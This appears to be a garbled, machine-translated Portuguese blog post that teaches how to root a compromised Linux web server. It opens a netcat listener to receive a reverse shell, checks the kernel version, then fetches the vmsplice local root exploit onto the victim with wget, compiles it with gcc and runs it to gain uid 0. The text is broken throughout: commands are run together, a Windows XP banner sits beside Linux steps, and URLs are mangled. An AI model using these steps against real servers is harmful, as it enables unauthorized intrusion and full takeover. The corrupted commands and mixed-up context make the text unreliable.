Microsoft Windows XP [Versão 5.1.2600]
© Copyright 1985-2001 Microsoft Corp
C: \> Medo cd C: \
C: \> cd windows
C: \> nc-l-n-v-p 4444
escutando em [qualquer] 4444 ...
Agora, quando você tem netcat ouvindo a porta que você transmitiu, clique em 'Connect'.
Quando o seu tipo, conectado 'whoami'. Você não deve ter raiz.
Agora, para encontrar um exploit para erradicar a caixa, você precisa saber o que está o kernel version.To fazer isso, basta digitar "uname-a '.
Deve ser algo assim:
Linux 2.6.17-linux1.dmehosting.com 92.1.10.el5PAE # 1 SMP ter 05 de agosto 08:14:05 EDT 2008 i686
Agora, nós vamos explorar-db.com e vamos olhar para '2 .6.17 '.
Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
Agora, nós Kernel tipo 'wget Linux 2.6.17 - 2.6.24.1 vmsplice Exploração root local na janela do netcat.
http://xpl_url.com wget
Assim, o exploit funciona, você deve compilá-lo no servidor (gcc) e executá-lo através de explorar (-o).
Para fazer "gcc 5092-o explorar" este tipo nós.
gcc-o exploit 5092
5092 - Após a url path.http :/ / www.site.com/5092.
exploit-Saída nome.
Agora você pode executar o exploit, digitando ". / Explorar"
Aguarde até que o exploit para concluir a execução e tipo de raiz novamente.
Deve saída em algo como isto:
uid = 0 (root) gid = 0 (root) groups = 500 (apache)
Isso significa que você tenha sucesso enraizada na caixa.
Há mais maneiras de fazer isso, esta é a maneira que eu costumo faze.
Nenhum comentário:
Postar um comentário